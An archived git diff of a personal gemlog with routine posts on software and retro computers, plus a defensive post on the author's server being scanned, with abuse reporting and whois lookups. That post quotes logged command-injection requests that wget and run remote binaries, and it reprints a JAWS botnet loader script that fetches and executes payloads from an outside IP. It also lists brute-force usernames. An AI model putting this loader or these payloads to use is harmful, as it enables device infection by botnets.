💾 Archived View for gmi.noulin.net › glog.diff captured on 2023-07-10 at 13:41:13.
⬅️ Previous capture (2023-05-30)
-=-=-=-=-=-=-
commit 393cd352fa81120d76b0b26546e87ea0544c13a5 Author: Remy Noulin <loader2x@gmail.com> Date: Sat Jun 24 18:08:51 2023 +0200 Update diff --git a/2020-07-10-emulators-in-debian-buster.gmi b/2020-07-10-emulators-in-debian-buster.gmi index 18b2d3a..35a4e45 100644 --- a/2020-07-10-emulators-in-debian-buster.gmi +++ b/2020-07-10-emulators-in-debian-buster.gmi @@ -28,6 +28,8 @@ I created a few maps for openra, they are available for download at => https://resource.openra.net/maps/49241/ Baltic Sea , => https://resource.openra.net/maps/49836/ Turkey +, +=> https://resource.openra.net/maps/52421/ Korea . Only the person creating the network game needs to copy the map file to: diff --git a/2020-07-28-privacy.gmi b/2020-07-28-privacy.gmi index 91b1bed..4f3dd6b 100644 --- a/2020-07-28-privacy.gmi +++ b/2020-07-28-privacy.gmi @@ -45,6 +45,7 @@ In firefox, I change the default configuration and have a bunch of plugins. * about:config **browser.urlbar.suggest.searches** = false * about:config **network.trr.mode** = 5 (disable trusted recursive resolver dns over https by choice) * about:config **extensions.webextensions.retrictedDomains** = "" (enable ad blockers on all domains, inculding mozilla domains) +* from firefox 114, about:config **cookiebanners.ui.desktop.enabled** = true **Plugins:** diff --git a/2021-07-21-ssh-clients-in-ios.gmi b/2021-07-21-ssh-clients-in-ios.gmi index 37929e9..fb77748 100644 --- a/2021-07-21-ssh-clients-in-ios.gmi +++ b/2021-07-21-ssh-clients-in-ios.gmi @@ -2,7 +2,7 @@ => feed.gmi Feed -date: 2022-10-21 13:55:22 +date: 2023-06-05 13:50:18 categories: updates @@ -14,13 +14,18 @@ On my iPhone, I usually use the termius SSH client but today when I tried to sta This happened before: In 2011, I was using the SSH client called `Prompt` then I was forced to update the app and couldn't use it anymore, that's when I started using termius. -Shelly works but there is a nagging screen, so now I use: +// Shelly works but there is a nagging screen, so now I use: -Blink Shell & Code Editor (free and open source) +// Blink Shell & Code Editor (free and open source) +// => https://blink.sh blink.sh -Well, sometimes blink looks itself and I have to wait 1 minute. +// Well, sometimes blink locks itself and I have to wait 1 minute. + +Now there is an update for blink and it seems I have to pay a subscription to be able to use it (I updated because it was not displaying text correctly anymore). + +I use Shelly instead. hashtags: #updates #ssh #iphone diff --git a/2021-10-02-newsgroups-on-usenet.gmi b/2021-10-02-newsgroups-on-usenet.gmi index b561fe9..7c0f568 100644 --- a/2021-10-02-newsgroups-on-usenet.gmi +++ b/2021-10-02-newsgroups-on-usenet.gmi @@ -32,6 +32,11 @@ I checked out some newsgroups and I found some that still active like `comp.lang There is a list of News service providers at: => https://www.big-8.org/wiki/News_service_providers NSP list +Other server lists: +=> http://usenet.ovh/?article=faq_serveur_gratuit Serveurs de newsgroups + +=> https://sybershock.com/#usenet Usenet + These NSPs are free and text-only: * diff --git a/2021-12-25-gcc-warning-options.gmi b/2021-12-25-gcc-warning-options.gmi index 8f82ca8..b957d17 100644 --- a/2021-12-25-gcc-warning-options.gmi +++ b/2021-12-25-gcc-warning-options.gmi @@ -87,6 +87,10 @@ For more detailed information about Clang warning options check out => https://clang.llvm.org/docs/DiagnosticsReference.html Diagnostic flags in Clang (short descriptions) . +# Guides + +[https://github.com/ossf/wg-best-practices-os-developers/blob/main/docs/Compiler_Hardening_Guides/Compiler-Options-Hardening-Guide-for-C-and-C++.md](Compiler Options Hardening Guide for C and C++) + hashtags: #cprogramming => feed.gmi Feed diff --git a/2022-02-24-my-privacy-settings-in-ios-and-android.gmi b/2022-02-24-my-privacy-settings-in-ios-and-android.gmi index 670b447..854c493 100644 --- a/2022-02-24-my-privacy-settings-in-ios-and-android.gmi +++ b/2022-02-24-my-privacy-settings-in-ios-and-android.gmi @@ -69,6 +69,6 @@ I wish these settings would be opted out by default when the account is created * => 2022-01-29-google-takeout.gmi Delete data with Google Takeout -hashtags: #privacy +hashtags: #privacy #iphone #android => feed.gmi Feed diff --git a/2023-06-24-my-server-is-getting-scanned-all-the-time.gmi b/2023-06-24-my-server-is-getting-scanned-all-the-time.gmi new file mode 100644 index 0000000..edbdb0f --- /dev/null +++ b/2023-06-24-my-server-is-getting-scanned-all-the-time.gmi @@ -0,0 +1,459 @@ +# My server is getting scanned all the time + +=> feed.gmi Feed + +date: 2023-06-24 18:07:35 + +categories: default + +firstPublishDate: 2023-06-24 18:07:35 + +My server runs a web server and an ssh server, there is nothing on the web server and there is no link on the internet pointing to it, all devices connected to the internet are getting scanned. + +Normally nobody would connect to port 80 since there are no links and no content, but there are lots of connections happening. + +The web server gets these type accesses: + +``` +GET /.env HTTP/1.1 +GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1 +GET /shell?cd+/tmp;rm+-rf+*;wget+204.44.109.117/jaws;sh+/tmp/jaws HTTP/1.1 +GET /proxychecker/index.php HTTP/1.1 +GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0 +HEAD /wordpress HTTP/1.1 +POST /boaform/admin/formLogin HTTP/1.1 +GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://114.225.221.114:56637/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 +GET /echo.php HTTP/1.1 +GET /admin/db.sql HTTP/1.1 +CONNECT HTTP/1.1 +GET /?Z70166322662Q1 HTTP/1.1 +GET /MyAdmin/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0 +GET /phpmyadmin/scripts/setup.php HTTP/1.0 +GET /php/scripts/setup.php HTTP/1.0 +GET /mysqladmin/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin/scripts/setup.php HTTP/1.0 +GET /_phpMyAdmin/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0 +GET /dbadmin/scripts/setup.php HTTP/1.0 +GET /mysqlmanager/scripts/setup.php HTTP/1.0 +GET /sqlweb/scripts/setup.php HTTP/1.0 +GET /webadmin/scripts/setup.php HTTP/1.0 +GET /phpmanager/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2/scripts/setup.php HTTP/1.0 +GET /db/scripts/setup.php HTTP/1.0 +GET /admin/phpmyadmin/scripts/setup.txt HTTP/1.0 +GET /mysql/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0 +GET /admin/pma/scripts/setup.php HTTP/1.0 +GET /myadmin/scripts/setup.php HTTP/1.0 +GET /PHPMYADMIN/scripts/setup.php HTTP/1.0 +GET /pma/scripts/setup.php HTTP/1.0 +GET /mysql-admin/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0 +GET /websql/scripts/setup.php HTTP/1.0 +GET /sqlmanager/scripts/setup.php HTTP/1.0 +GET /phpma/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin3/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0 +GET /admin/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin2/scripts/setup.php HTTP/1.0 +GET /web/phpMyAdmin/scripts/setup.php HTTP/1.0 +GET /php-myadmin/scripts/setup.php HTTP/1.0 +GET /phpmy-admin/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0 +GET /webdb/scripts/setup.php HTTP/1.0 +GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0 +GET /SQL/scripts/setup.php HTTP/1.0 +POST /mgmt/tm/util/bash HTTP/1.1 +GET /.git/HEAD HTTP/1.1 +GET /nmaplowercheck1680223056 HTTP/1.1 +GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1 +``` + +These requests come from: + +* data centers: 'security research' at companies and universities, vps running malicious software, vps created and destroyed after a few hours (only the SSH port is open, these machines only scan), game servers... +* ISPs: compromised computers and internet devices: routers, internet connected cameras, self-hosters... +* Mobile phone operators, mobile phones running malware + +To get some information about the source ips, enter the ip in the greynoise service: +=> https://viz.greynoise.io/ +=> https://viz.greynoise.io/ + +There is also the abuseipdb service: +=> https://www.abuseipdb.com/ +=> https://www.abuseipdb.com/ + +Some of the tools used to scan the machines are: +=> https://github.com/robertdavidgraham/masscan massscan + +=> https://nmap.org/ nmap + +=> https://zmap.io/ zgrab +anonymous botnets + +[https://en.wikipedia.org/wiki/Botnet](Botnet article on Wikipedia) + +Some of the 'security research' companies are: + +* internet-census.org: ip 185.180.143.72 as211680 anubisnetworks.com +* shodan.io: ip 198.20.69.98 census2.shodan.io as32475 singlehop.com, ip 185.142.236.41 guitar.census.shodan.io as174 cogentco.com +* +=> https://academyforinternetresearch.org/ academyforinternetresearch + +Theses companies map the internet and sell the data to other companies. + +The 'security research' labs leave a message with contact information and one can opt out from the scan: + +``` +Ip: 38.110.46.2 + Hello, + + This is a research scanning machine from the Georgia Institute of Technology. + This machine regularly conducts scans of the entire Internet so you may have been scanned as part of an ongoing research project. + + If you have been or are currently being scanned and would like to opt out, please email + scp-network-measurement@cc.gatech.edu with the name or address of the scanner, + and the IP ranges you would like to exclude in CIDR format and we will respond immediately. +``` + +Scanning back the source ips, I found devices like: + +* a DVR from +=> https://shieldcctv.com/filter/dvr shield technology +running malware. +* a Microtik router running RouterOS 6.34.2 (release in 2016). +* a Cisco router +* machines running OpenVPN CWS on a web server. + +I found a service selling access to proxy servers: +=> http://www.proxywiki.org/ proxywiki + +=> https://www.xroxy.com/ xroxy + +=> http://www.proxyrss.com/ proxyrss + +=> http://www.proxville.com/ proxville + +=> http://www.proxy-toplist.com/ proxy-toplist + +When the source ip is from a mobile operator, the device is behind cgnat and is unreachable and in general it is the ip of a CISCO router. + +The location of the source ips is all over the world, on some days most of the scans were coming from brazil mobile phone networks and ISPs, I think people there are running an app containing some malware... Some scans happen during the day in the source ip location so the malicious software runs on devices that people turn on and off. + +To reduce the amount of scans, I have been blocking ASNs. The first blocked ASNs were the big clouds: Amazon, Azure, Google, Digital Ocean, Vutlr, Ovh,... because those clouds do a lot of scanning from many ips. + +Over the course of 2 months, the scans have been coming from about 1400 ASNs, these ASNs route 1.3 billion ipv4 addresses. + +[gemini://gmi.noulin.net/asns.txt](ASNs with devices scanning my server) + +There are VPSes in Digital ocean distributing malware, I reported the abuse and Digital ocean terminated the user account. + +Report abuses at: [https://www.digitalocean.com/company/contact/#abuse](Digital Ocean Abuse) + +For all my abuse reports, I get this reply: + +``` +Subject: New Intrusion/Exploit Abuse Form Submission +Hello, + +Thank you for the report. We have notified the appropriate customers. + +We appreciate your efforts in helping to clean up the internet! + +Regards, +Security Operations Center +DigitalOcean +``` + +AWS, Microsoft and Google also have abuse report pages: [https://aws.amazon.com/forms/report-abuse](AWS abuse) [https://msrc.microsoft.com/report/abuse](Microsoft abuse) [https://support.google.com/code/contact/cloud_platform_report?hl=en](Google abuse) + +The web server gets a lot of request like this `/shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws`, I searched for the program generating these requests and I found a version of the script trying to upload jaws: [https://github.com/R00tS3c/DDOS-RootSec/blob/master/Botnets/Exploits/JAWS/jaws_loader.py](Jaws loader github) + +``` +#Jaws Exploit Loader +import random, socket, time, sys, requests, re, os +from multiprocessing import Process + +if len(sys.argv) < 2: + sys.exit("usage: python %s <input list> <port>" % (sys.argv[0])) + +bin_names = ["ARM7", "ARM4"] +list = open(sys.argv[1], "r").readlines() +port = sys.argv[2] + +def send_payload(target): + for names in bin_names: + print "[JAWS/1.0] attempting to infect %s with bin %s" % (target, names) + url = "http://" + target + ":" + port + "/shell?cd /tmp; echo >NiGGeR || cd /var; echo >NiGGeR; cp /bin/busybox yeet; >yeet; chmod 777 yeet; nohup wget http:/\/209.66.128.162:80/%s -O yeet || nohup tftp -r %s -g 209.66.128.162 -l yeet; chmod 777 yeet;./yeet; rm -rf yeeter >/dev/null 2>&1" % (names, names) + try: + output = requests.get(url, timeout=3) + if output.status_code == int('200'): + print "[JAWS/1.0] infected %s" % (target) + file_h = open("jaws_infected.txt", "a+") + file_h.write(target + "\n") + file_h.close() + break + except: + pass + +for i in open(sys.argv[1]).readlines(): + try: + i = i.strip("\r\n") + t = Process(target=send_payload, args=(i,)) + t.start() + except KeyboardInterrupt: + os.kill(os.getpid(), 9) + except: + pass +``` + +Some machines are running a version of the mirai botnet, on port 1024 I got: + +``` +Welcome to the Yugi v4 Mirai Variant! + +# scan the machines with nmap: +nmap -sS -O 109.205.213.41 +Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-10 07:16 +02 +Nmap scan report for 109.205.213.41 +Host is up (0.094s latency). +Not shown: 995 closed ports +PORT STATE SERVICE +21/tcp open ftp +22/tcp open ssh +80/tcp open http +1024/tcp open kdm +3306/tcp open mysql +Device type: general purpose +Running: Linux 4.X +OS CPE: cpe:/o:linux:linux_kernel:4.4 +OS details: Linux 4.4 +Network Distance: 19 hops +``` + +The SSH service is the most scanned, the botnets scanning SSH are more widespread than the ones scanning the web servers. These scans come from the same type of networks (data centers, ISPs, mobile networks) and from more geographical locations. I use rate limiter (fail2ban and sshguard) and I get 3 login attempts per minute from 200 ips a day from these type of machines: + +* Linux Servers +* Android devices + +Android devices are the majority of devices scanning the SSH services when they are connected to Wifi and mobile networks. I haven't found any information about which apps run these botnets. + +Maybe there is some information on github: [https://github.com/topics/android-botnet](Android botnet topic on github) + +The botnets use the root username most of the time and also try many other usernames, some of them are: + +``` +.log 123!@# 159casia@yhy357 Cmadaas@2019 NetAdmin Wanglei00 a adam adfexc adm admin admin1234 alan an appldev aqswdefr bds black bpsolutions build byzoro cactiuser cluster com cvs debian deployer dev didichan dmdba dpoint dreambox elk es flw ftp_user ftpadmin gandalf graphic greenplum guest hadoop hhm huawei hxhtftp hxhttp hyper information inspur invoice jboss jenkins jhj jiangyue john jtx9d321 jysong kafka lafe lenovo liuyichen lixiaoke localhost lsfadmin lsh lxc maowd matt minecraft myapn_cen nadmin nagios njzt nmsuser now5 nvidia odoo openpose oracle oracletest osboxes ossuser owa prabha prueba ps qlli qwy robertlu root rzchi secadd share shiluj shop shopdb steam student suahn21 subzero swsong tao test test1 test2 thl tiago tiankong314 tippy tomcat tve ubuntu ubuntu1 uftp usearch user user0 user01 user5 vbox vps web webadmin webapp wocloud wsm wuhz wwwlog xiangliyao yskwon yuelv za zhangby zhangyi zhasen zhouxy zone zxcasd +``` + +There are mobile phone with botnets preinstalled: [https://www.techspot.com/news/98667-millions-android-phones-come-pre-installed-malware-there.html](Preinstalled botnets on android phones) + +I want to be able monitor the connection from my android phone and I found the netguard app which works as a firewall but it creates a VPN which drains the battery. It would be better to have access to nftables and iptables since android runs linux. + +There is a service that gives the email address to report abuse for an ip address: +=> abuse.net +=> https://www.abuse.net + +Most of the time, I don't get a reply to my abuse report. + +I have got this reply from MVPS.net: + +``` +Thank you for the notification. We've suspended the service. + +Kind Regards, +MVPS.net Abuse +``` + +I sent an abuse email to JPNIC, I thought it was the ISP because the domain is `nic.ad.jp` and I got the email address from abuse.net. JPNIC replied telling me to use whois: + +``` +whois -h whois.nic.ad.jp 210.149.68.157/e +[ JPNIC database provides information regarding IP address and ASN. Its use ] +[ is restricted to network administration purposes. For further information, ] +[ use 'whois -h whois.nic.ad.jp help'. To only display English output, ] +[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ] + +Network Information: +a. [Network Number] 210.149.68.0/24 +b. [Network Name] T-CLOUD-2 +g. [Organization] Thomas of America +m. [Administrative Contact] AS30773JP +n. [Technical Contact] AS30773JP +o. [Abuse] +p. [Nameserver] ns1.raservers.net +p. [Nameserver] ns2.raservers.net +[Assigned Date] 2020/10/07 +[Return Date] +[Last Update] 2020/12/21 13:17:03(JST) + +Less Specific Info. +---------- +Internet Initiative Japan Inc. + [Allocation] 210.149.0.0/16 + +More Specific Info. +---------- +No match!! +``` + +The contact information is `AS30773JP`, it is an ASN. So I queried JPNIC about this ASN: + +``` +whois -h whois.nic.ad.jp ^AS30773JP +[ JPNIC database provides information regarding IP address and ASN. Its use ] +[ is restricted to network administration purposes. For further information, ] +[ use 'whois -h whois.nic.ad.jp help'. To only display English output, ] +[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ] + +Contact Information: +a. [JPNIC Handle] AS30773JP +c. [Last, First] Sogi, Akiyuki +d. [E-Mail] support@1strentalserver.com +g. [Organization] Thomas of America +l. [Division] Hosting devision +n. [Title] +o. [TEL] +p. [FAX] +y. [Reply Mail] apply@iij.ad.jp +[Last Update] 2020/10/05 10:53:03(JST) + db-staff@nic.ad.jp +``` + +I suppose the abuse email address is on the d line. + +The address of the RIRs whois databases are: + +``` + APNIC WHOIS(whois.apnic.net) + ARIN WHOIS(whois.arin.net) + AfriNIC WHOIS(whois.afrinic.net) + JPNIC WHOIS(whois.nic.ad.jp) + LACNIC WHOIS(whois.lacnic.net) + RIPE WHOIS(whois.ripe.net) +``` + +With whois, I sometimes get the abuse email directly: + +``` +whois -h whois.apnic.net 203.114.102.173 +% [whois.apnic.net] +% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html + +% Information related to '203.114.96.0 - 203.114.127.255' + +% Abuse contact for '203.114.96.0 - 203.114.127.255' is 'abuse@totisp.net' + +inetnum: 203.114.96.0 - 203.114.127.255 +netname: TOTNET-AP +descr: TOT public company limited +descr: Telecommunication Provider, Network Service Provider (NSP) +descr: Internet Service Provider (ISP) in Thailand +country: TH +org: ORG-TPCL1-AP +admin-c: pa82-ap +tech-c: tk56-ap +tech-c: SS110-AP +abuse-c: AT950-AP +status: ALLOCATED PORTABLE +remarks: ------------------------------------------------ +remarks: This object can only be modified by APNIC hostmaster +remarks: If you wish to modify this object details please +remarks: send email to hostmaster@apnic.net with your organisation +remarks: account name in the subject line. +remarks: ------------------------------------------------ +mnt-by: APNIC-HM +mnt-lower: MAINT-TH-TOT +mnt-routes: MAINT-TH-TOT +mnt-irt: IRT-TOT-TH +last-modified: 2020-07-09T07:13:24Z +source: APNIC +``` + +To list the networks belonging to an AS with whois, query radb like this: + +``` +whois -h whois.radb.net -- '-i origin AS134166' +route: 203.114.102.0/24 +descr: CAT route object for TOT +origin: AS134166 +mnt-by: MAINT-THIX-CAT-TH +changed: catdb@cat.net.th 20160112 +source: RADB + +route: 1.179.247.0/24 +descr: CAT route object for TOT +origin: AS134166 +mnt-by: MAINT-THIX-CAT-TH +changed: catdb@cat.net.th 20160125 +source: RADB + +... + +# LIST ipv4 NETWORKS ONLY: +whois -h whois.radb.net -- '-i origin AS134166'| grep -Eo "([0-9.]+){4}/[0-9]+"|sort -u +113.53.228.0/24 +1.179.246.0/23 +1.179.246.0/24 +1.179.247.0/24 +118.174.10.0/24 +118.174.11.0/24 +118.174.8.0/22 +118.174.8.0/24 +118.174.9.0/24 +118.175.1.0/24 +118.175.28.0/24 +180.180.242.0/23 +180.180.242.0/24 +180.180.243.0/24 +180.180.244.0/23 +180.180.244.0/24 +180.180.245.0/24 +180.180.247.0/24 +203.113.10.0/24 +203.113.11.0/24 +203.113.12.0/24 +203.113.124.0/24 +203.113.125.0/24 +203.113.126.0/24 +203.113.14.0/24 +203.113.15.0/24 +203.113.25.0/24 +203.113.4.0/24 +203.113.5.0/24 +203.113.6.0/24 +203.113.70.0/24 +203.113.7.0/24 +203.113.71.0/24 +203.113.8.0/22 +203.113.8.0/24 +203.113.9.0/24 +203.113.95.0/24 +203.114.100.0/24 +203.114.102.0/24 +203.114.112.0/24 +203.114.116.0/24 +203.114.96.0/24 +203.114.97.0/24 +203.114.98.0/24 +203.114.99.0/24 +``` + +The list of networks I get with these queries is not accurate, some networks belong to other ASNs, I prefer to ip2location + +=> ip2location.com +=> https://ip2location.com + +Every day I'm adding ASNs to the list, but now I'm getting 2 to 5 bruteforce login attempts a day on the SSH service, which is low compare to where it was at the begining. + +Hashtags: #botnet #malware #security #exploits #zombie #abuse #whois + +=> feed.gmi Feed commit fef1149872a8f0f630b4de3efcca38f44f58a8de Author: Remy Noulin <loader2x@gmail.com> Date: Sun May 14 15:36:03 2023 +0200 Update diff --git a/2020-07-10-emulators-in-debian-buster.gmi b/2020-07-10-emulators-in-debian-buster.gmi index ab53d15..18b2d3a 100644 --- a/2020-07-10-emulators-in-debian-buster.gmi +++ b/2020-07-10-emulators-in-debian-buster.gmi @@ -16,7 +16,7 @@ I downloaded the AppImage, chmoded the file to 755 and it works. At the first run, it downloads automatically the game data. -I created the map of france and crimea for openra, it is available for download at +I created a few maps for openra, they are available for download at => https://resource.openra.net/maps/47142 France , => https://resource.openra.net/maps/49006/ Crimea @@ -33,7 +33,7 @@ I created the map of france and crimea for openra, it is available for download Only the person creating the network game needs to copy the map file to: ``` -~/.config/openra/maps/ra/release-20210321/ +~/.config/openra/maps/ra/release-20230225/ ``` The other players can download the map from the game interface. diff --git a/2023-03-21-how-to-create-a-partition-larger-than-2tb-with-fdisk.gmi b/2023-03-21-how-to-create-a-partition-larger-than-2tb-with-fdisk.gmi index 70860f3..84877f7 100644 --- a/2023-03-21-how-to-create-a-partition-larger-than-2tb-with-fdisk.gmi +++ b/2023-03-21-how-to-create-a-partition-larger-than-2tb-with-fdisk.gmi @@ -1,4 +1,4 @@ -# how to create a partition larger than 2TB with fdisk +# How to create a partition larger than 2TB with fdisk => feed.gmi Feed @@ -103,4 +103,6 @@ Writing superblocks and filesystem accounting information: done # mount /dev/nvme0n1p1 /mnt ``` +Hashtag: #fdisk + => feed.gmi Feed diff --git a/2023-04-06-installing-freebsd.gmi b/2023-04-06-installing-freebsd.gmi index 8ca210a..cff5a25 100644 --- a/2023-04-06-installing-freebsd.gmi +++ b/2023-04-06-installing-freebsd.gmi @@ -42,4 +42,6 @@ Libc in FreeBSD is a bit different compare to glibc: * glibc supports user define type specifiers for printf format strings * libgen.h has to be explicitly included for the basename function +Hashtag: #freebsd + => feed.gmi Feed diff --git a/2023-05-14-computers-of-the-80s.gmi b/2023-05-14-computers-of-the-80s.gmi new file mode 100644 index 0000000..74682ff --- /dev/null +++ b/2023-05-14-computers-of-the-80s.gmi @@ -0,0 +1,115 @@ +# Computers of the 80s + +=> feed.gmi Feed + +date: 2023-05-14 15:34:48 + +categories: default + +firstPublishDate: 2023-05-14 15:34:48 + +My first computer was a Sinclair ZX Spectrum 48, an 8 bit computer, I got it for christmas in 1982. When I was in the computer shop with my parents in Paris, I looked briefly at the Intellivision and Atari 2600 and I spent most of my time playing Mine Storm on the Vectrex, I was impressed by the vector graphics, meanwhile my parents were talking with the salesman about the microcomputers. + +=> https://en.wikipedia.org/wiki/Intellivision Intellivision + +=> https://en.wikipedia.org/wiki/Atari_2600 Atari 2600 + +=> https://en.wikipedia.org/wiki/Vectrex Vectrex + +I wanted to buy the Vectrex but my parents told me there were only games for this machine, they thought the Spectrum was better because there were more games, it could be programmed and the price/feature ratio was good. In retropect, it was the right choice, the games were good and I liked programing in BASIC. + +A friend of mine had in Atari 2600, I thought the game were fun and well done. + +At school, there were computer rooms with microcomputers, they had: + +* Dragon 32 or 64, I thought this computer was worse than Spectrum. It had lower graphics and slower CPU. +* Sinclair ZX81 was previous generation Sinclair computers, it had too little RAM and lower graphics +* Oric Atmos, less software was developed for this computer compare to the Spectrum. +* Commodore 64, better than the Spectrum and too expensive. +* Thomson TO7, it had a 1Mhz CPU and was a bit slow. But it had an optical pen and could draw straight line on the screen. A friend had one because his parent wanted to buy a french computer. +* Commodore VIC-20, it had less RAM than the Spectrum. +* Thomson MO5, the Spectrum was better (1Mhz CPU). + +=> https://en.wikipedia.org/wiki/Dragon_64 Dragon 64 + +=> https://en.wikipedia.org/wiki/ZX81 ZX 81 + +=> https://en.wikipedia.org/wiki/Oric_Atmos Oric Atmos + +=> https://en.wikipedia.org/wiki/C64 Commodore 64 + +=> https://en.wikipedia.org/wiki/To7 Thomson TO7 + +=> https://en.wikipedia.org/wiki/VIC-20 VIC-20 + +=> https://en.wikipedia.org/wiki/Thomson_MO5 Thomson MO5 + +When I saw the Sinclair QL, I didn't like it because there were not a lot of software for it and it was too expensive, I was impressed by the 128kb of RAM. I didn't know about the 32bit CPU and I thought it was a Z80 CPU. + +=> https://en.wikipedia.org/wiki/Sinclair_ql Sinclair QL + +The computers during this period were not compatible with each other, so it was very important that the wanted set of software was available for the chosen computer. They were booting to basic so most kids were programming in basic. + +In 1986, a friend of mine had a Thomson TO9+, this computer had a 1Mhz CPU and I thought that's bad all other computers have faster CPUs. + +=> https://en.wikipedia.org/wiki/Thomson_TO9%2B Thomson TO9+ + +I saw the MSX in computer magazines, it was a powerful machine but too expensive. + +=> https://en.wikipedia.org/wiki/MSX MSX + +I met someone who had an Exelvision, I thought there were some cool features: it had cartridges (it was fast to load programs, on the Spectrum it was taking between 10 and 20 minutes to load a program from tape) and it had speech synthesis and I didn't know about the other features (RAM, CPU and graphics). + +=> https://en.wikipedia.org/wiki/Exelvision Exelvision + +One day someone my mom knew came to our house with an Apple Macintosh, I thought the good feature were the floppy disk, the mouse and the graphics but it was too expensive and it didn't have a lot of games. + +=> https://en.wikipedia.org/wiki/Macintosh_128K Macintosh 128K + +Later my parents bought an Amstrad CPC 6128 because it was an improved Spectrum with 3 inch floppy disk, more RAM and better graphics with a palette of 27 colors with the right price. There were lots of software available for this computer, it was quite easy to port the games from the Spectrum to the CPC. + +=> https://en.wikipedia.org/wiki/Amstrad_CPC_6128 Amstrad CPC 6128 + +My uncle had an IBM PC 5150, I had CPM on the CPC and I thought MSDOS was similar and better but the screen was displaying only text in black and green, so I didn't like it. It was slow to start because it was checking the RAM at boot (the Spectrum and CPC were booting instantly). + +=> https://en.wikipedia.org/wiki/IBM_5150 IBM PC + +In the 80s, the display resolution, the palette and the number of colors on screen were important and there were significant improvements. On the Spectrum, we couldn't display anything close to a photo. My PC with VGA and MCGA was the first computer display photos in 256 colors. + +The best games were on arcade. They had better gameplay, more colors, better animation and better sound. The arcade games were ported to microcomputers and the best to worse versions were: Amiga, Atari ST, Amstrad CPC / Comodore 64, Spectrum. + +Today, we can still play the 80's games, thanks to the emulators. + +=> 2020-07-10-emulators-in-debian-buster.gmi Emulators in Debian + +Some of the games I was playing: + +``` +Arcadia +Atic Atac +Battle Car +Beach Head +Boulder Dash +Bruce Lee +Cavern Fighter +Enduro Racer +Interceptor +Jet Pac +Jumping Jack +Macadam Bumper +Moon Alert +PSSST +Road Toad +Saboter +Sir Lancelot +Slap Dad +Space Harrier +Spectres +The Rocky Horror Show +The exploding Fist +Winter Games +``` + +After this generation of 8bit computers, there were the Amiga, Atari ST, 80286 and 80386 PCs with VGA graphics. + +=> feed.gmi Feed commit d8c9589c9895c4e5e0af606993c9308db6530b6a Author: Remy Noulin <loader2x@gmail.com> Date: Thu Apr 6 13:46:00 2023 +0200 Update diff --git a/2021-10-02-newsgroups-on-usenet.gmi b/2021-10-02-newsgroups-on-usenet.gmi index d5a8d56..b561fe9 100644 --- a/2021-10-02-newsgroups-on-usenet.gmi +++ b/2021-10-02-newsgroups-on-usenet.gmi @@ -42,6 +42,8 @@ These NSPs are free and text-only: => https://www.solani.org/ solani * => https://dotsrc.org/usenet/ dotsrc +* +=> https://usenet.blueworldhosting.com/ BlueWorld Usenet Farm # Newsreader software diff --git a/2023-04-06-installing-freebsd.gmi b/2023-04-06-installing-freebsd.gmi new file mode 100644 index 0000000..8ca210a --- /dev/null +++ b/2023-04-06-installing-freebsd.gmi @@ -0,0 +1,45 @@ +# Installing FreeBSD + +=> feed.gmi Feed + +date: 2023-04-06 13:34:23 + +categories: default + +firstPublishDate: 2023-04-06 13:34:23 + +I recently installed FreeBSD on a Dell Latitude D610 laptop (2005) and it worked directly with the default configuration. + +How to install FreeBSD with a USB stick: + +``` +# copy the memstick image to the USB stick +dd if=FreeBSD-13.2-RC3-i386-memstick.img of=/dev/sdb bs=1M conv=sync +# boot on USB and setup partitions... +# install GUI +pkg install xorg +pw groupmod video -m guestuser || pw groupmod wheel -m guestuser +pkg install git +# install and start xfce +pkg install xfce +echo "exec /usr/local/bin/startxfce4 --with-ck-launch" > ~/.xinitrc +startx +``` + +After boot, the system takes 200MB and when XFCE is started, it take around 400MB. + +I changed the sshd configuration to allow root login with keys. + +``` +vi /etc/ssh/sshd_config +PermitRootLogin prohibit-password + +service sshd restart +``` + +Libc in FreeBSD is a bit different compare to glibc: + +* glibc supports user define type specifiers for printf format strings +* libgen.h has to be explicitly included for the basename function + +=> feed.gmi Feed commit 3d49cb3c8abaebeadcfd3ece96bd3d6ef666b06f Author: Remy Noulin <loader2x@gmail.com> Date: Tue Mar 21 15:34:54 2023 +0200 Update diff --git a/2023-03-21-how-to-create-a-partition-larger-than-2tb-with-fdisk.gmi b/2023-03-21-how-to-create-a-partition-larger-than-2tb-with-fdisk.gmi new file mode 100644 index 0000000..70860f3 --- /dev/null +++ b/2023-03-21-how-to-create-a-partition-larger-than-2tb-with-fdisk.gmi @@ -0,0 +1,106 @@ +# how to create a partition larger than 2TB with fdisk + +=> feed.gmi Feed + +date: 2023-03-21 15:33:45 + +categories: tools + +firstPublishDate: 2023-03-21 